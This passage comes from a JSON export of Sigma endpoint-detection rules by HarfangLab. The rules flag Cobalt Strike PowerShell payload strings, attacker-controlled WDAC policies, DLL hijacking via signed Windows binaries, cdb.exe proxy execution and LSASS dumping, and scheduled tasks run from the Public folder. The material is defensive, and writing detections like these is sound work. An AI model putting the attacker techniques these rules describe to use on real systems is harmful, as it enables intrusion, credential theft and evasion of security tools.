"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083954Z",
"creation_date": "2026-03-23T11:45:34.083963Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083968Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://gchq.github.io/CyberChef/",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/software/S0154/"
],
"name": "t1059_001_cobalt_powershell_payload.yml",
"content": "title: Cobalt Strike PowerShell Payload Detected\nid: 9f0f3944-c7d2-4c5f-888b-bac198e03921\ndescription: |\n Detects the standard Cobalt Strike PowerShell payload template.\n The goal of the payload is to create a connection to the team server to allow an attacker to interact with the machine.\n The payload can be easily decoded with CyberChef tool.\n It is recommended to investigate the process tree for suspicious activities.\nreferences:\n - https://gchq.github.io/CyberChef/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/software/S0154/\ndate: 2021/11/23\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.t1106\n - attack.s0154\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.CobaltStrike\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n # .NET APIs\n - 'GetMethod'\n - 'GetDelegateForFunctionPointer'\n\n # Native APIs\n - 'VirtualAlloc'\n - 'GetProcAddress'\n - 'GetModuleHandle'\n\n # payload XOR loop\n - '-bxor 35'\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9f0f3944-c7d2-4c5f-888b-bac198e03921",
"rule_name": "Cobalt Strike PowerShell Payload Detected",
"rule_description": "Detects the standard Cobalt Strike PowerShell payload template.\nThe goal of the payload is to create a connection to the team server to allow an attacker to interact with the machine.\nThe payload can be easily decoded with CyberChef tool.\nIt is recommended to investigate the process tree for suspicious activities.\n",
"rule_creation_date": "2021-11-23",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1106"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9f13ba3c-0293-498b-b769-b5966fb5c0ba",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622404Z",
"creation_date": "2026-03-23T11:45:34.622406Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622411Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://beierle.win/2024-12-20-Weaponizing-WDAC-Killing-the-Dreams-of-EDR/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_suspicious_wdac_policy_created.yml",
"content": "title: Suspicious WDAC Policy Created\nid: 9f13ba3c-0293-498b-b769-b5966fb5c0ba\ndescription: |\n Detects the creation of a Windows Defender Application Control (WDAC) policy file, which may indicate changes to application trust or execution policies.\n Windows Defender Application Control (WDAC) is a Windows security feature that defines which applications and binaries are allowed to run on a system.\n An attacker-controlled WDAC policy can be used to bypass EDR enforcement, allow the execution of malicious code, and establish persistence by controlling which binaries are trusted on the system.\n It is recommended to investigate the originating process and context of the WDAC policy file creation to determine whether the activity is legitimate or malicious.\nreferences:\n - https://beierle.win/2024-12-20-Weaponizing-WDAC-Killing-the-Dreams-of-EDR/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2025/01/02\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path:\n - '?:\\Windows\\System32\\CodeIntegrity\\SiPolicy.p7b'\n - '?:\\Windows\\System32\\CodeIntegrity\\CiPolicies\\Active\\SiPolicy.p7b'\n - '?:\\Windows\\System32\\CodeIntegrity\\CiPolicies\\Active\\{????????-????-????-????-????????????}.cip'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_intune:\n ProcessImage: '?:\\Windows\\System32\\omadmclient.exe'\n\n exclusion_wmi:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\wbem\\wmiprvse.exe -secured -Embedding'\n Path: '?:\\Windows\\System32\\CodeIntegrity\\SiPolicy.p7b'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9f13ba3c-0293-498b-b769-b5966fb5c0ba",
"rule_name": "Suspicious WDAC Policy Created",
"rule_description": "Detects the creation of a Windows Defender Application Control (WDAC) policy file, which may indicate changes to application trust or execution policies.\nWindows Defender Application Control (WDAC) is a Windows security feature that defines which applications and binaries are allowed to run on a system.\nAn attacker-controlled WDAC policy can be used to bypass EDR enforcement, allow the execution of malicious code, and establish persistence by controlling which binaries are trusted on the system.\nIt is recommended to investigate the originating process and context of the WDAC policy file creation to determine whether the activity is legitimate or malicious.\n",
"rule_creation_date": "2025-01-02",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9f30d778-cc39-4952-97c0-7fa4be2c026e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611100Z",
"creation_date": "2026-03-23T11:45:34.611103Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611111Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_launchwinapp.yml",
"content": "title: DLL Hijacking via LaunchWinApp.exe\nid: 9f30d778-cc39-4952-97c0-7fa4be2c026e\ndescription: |\n Detects potential Windows DLL Hijacking via LaunchWinApp.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'LaunchWinApp.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\iertutil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9f30d778-cc39-4952-97c0-7fa4be2c026e",
"rule_name": "DLL Hijacking via LaunchWinApp.exe",
"rule_description": "Detects potential Windows DLL Hijacking via LaunchWinApp.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9f7e0fa2-5120-4011-8793-2b89c593ebe7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087631Z",
"creation_date": "2026-03-23T11:45:34.087633Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087637Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/",
"https://attack.mitre.org/techniques/T1127/"
],
"name": "t1127_cdb_execution_for_proxy_or_dump.yml",
"content": "title: Suspicious cdb.exe Execution\nid: 9f7e0fa2-5120-4011-8793-2b89c593ebe7\ndescription: |\n Detects a suspicious execution of cdb.exe.\n Attackers can use this legitimate developer tool in order to proxy the execution of malicious payloads or dump process memory (such as LSASS').\n It is recommended to investigate the file provided in the command-line to determine whether this action was legitimate.\nreferences:\n - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/\n - https://attack.mitre.org/techniques/T1127/\ndate: 2022/06/10\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.t1127\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Cdb\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'cdb.exe'\n\n selection_commandline_1:\n CommandLine|contains:\n - ' -c *$<*'\n - ' /c *$<*'\n\n selection_commandline_2:\n CommandLine|contains:\n - ' -cf '\n - ' /cf '\n\n condition: selection and 1 of selection_commandline_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9f7e0fa2-5120-4011-8793-2b89c593ebe7",
"rule_name": "Suspicious cdb.exe Execution",
"rule_description": "Detects a suspicious execution of cdb.exe.\nAttackers can use this legitimate developer tool in order to proxy the execution of malicious payloads or dump process memory (such as LSASS').\nIt is recommended to investigate the file provided in the command-line to determine whether this action was legitimate.\n",
"rule_creation_date": "2022-06-10",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1127",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9fbba3f7-6063-4790-ae44-e46758f630d3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607746Z",
"creation_date": "2026-03-23T11:45:34.607749Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607757Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1053_scheduled_task_public_folder.yml",
"content": "title: Scheduled Task Created in Public User Folder\nid: 9fbba3f7-6063-4790-ae44-e46758f630d3\ndescription: |\n Detects a scheduled task being created with one of its actions referencing the \"C:\\Users\\Public\" folder.\n This folder is an uncommon directory for binaries to execute from and is often abused by attackers.\n It is recommended to investigate the process creating the scheduled task, in addition to any binaries or commands referenced in the scheduled task for suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2025/10/16\nmodified: 2025/10/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.ScheduledTask\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: scheduled_task\ndetection:\n selection:\n OperationType: 'create'\n TaskContent|contains: '?:\\Users\\Public\\\\*.exe'\n\n filter_depth:\n TaskContent|contains: '?:\\Users\\Public\\\\*\\\\*.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9fbba3f7-6063-4790-ae44-e46758f630d3",
"rule_name": "Scheduled Task Created in Public User Folder",
"rule_description": "Detects a scheduled task being created with one of its actions referencing the \"C:\\Users\\Public\" folder.\nThis folder is an uncommon directory for binaries to execute from and is often abused by attackers.\nIt is recommended to investigate the process creating the scheduled task, in addition to any binaries or commands referenced in the scheduled task for suspicious activities.\n",
"rule_creation_date": "2025-10-16",
"rule_modified_date": "2025-10-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9fece9bc-3902-4c65-aa6a-0d1e161a1691",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594373Z",
"creation_date": "2026-03-23T11:45:34.594377Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594385Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_route.yml",
"content": "title: DLL Hijacking via route.exe\nid: 9fece9bc-3902-4c65-aa6a-0d1e161a1691\ndescription: |\n Detects potential Windows DLL Hijacking via route.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'route.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\IPHLPAPI.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9fece9bc-3902-4c65-aa6a-0d1e161a1691",
"rule_name": "DLL Hijacking via route.exe",
"rule_description": "Detects potential Windows DLL Hijacking via route.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a0466fa2-bd36-4417-8ffc-f643d82c590d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082703Z",
"creation_date": "2026-03-23T11:45:34.082705Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082710Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wimserv.yml",
"content": "title: DLL Hijacking via wimserv.exe\nid: a0466fa2-bd36-4417-8ffc-f643d82c590d\ndescription: |\n Detects potential Windows DLL Hijacking via wimserv.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wimserv.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\Cabinet.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a0466fa2-bd36-4417-8ffc-f643d82c590d",
"rule_name": "DLL Hijacking via wimserv.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wimserv.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a05613da-3d11-40bc-aeee-449f421ee503",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602077Z",
"creation_date": "2026-03-23T11:45:34.602080Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602088Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_unregmp2.yml",
"content": "title: DLL Hijacking via unregmp2.exe\nid: a05613da-3d11-40bc-aeee-449f421ee503\ndescription: |\n Detects potential Windows DLL Hijacking via unregmp2.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'unregmp2.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a05613da-3d11-40bc-aeee-449f421ee503",
"rule_name": "DLL Hijacking via unregmp2.exe",
"rule_description": "Detects potential Windows DLL Hijacking via unregmp2.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a07274ba-e853-4ac9-b887-bc07d56cd242",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
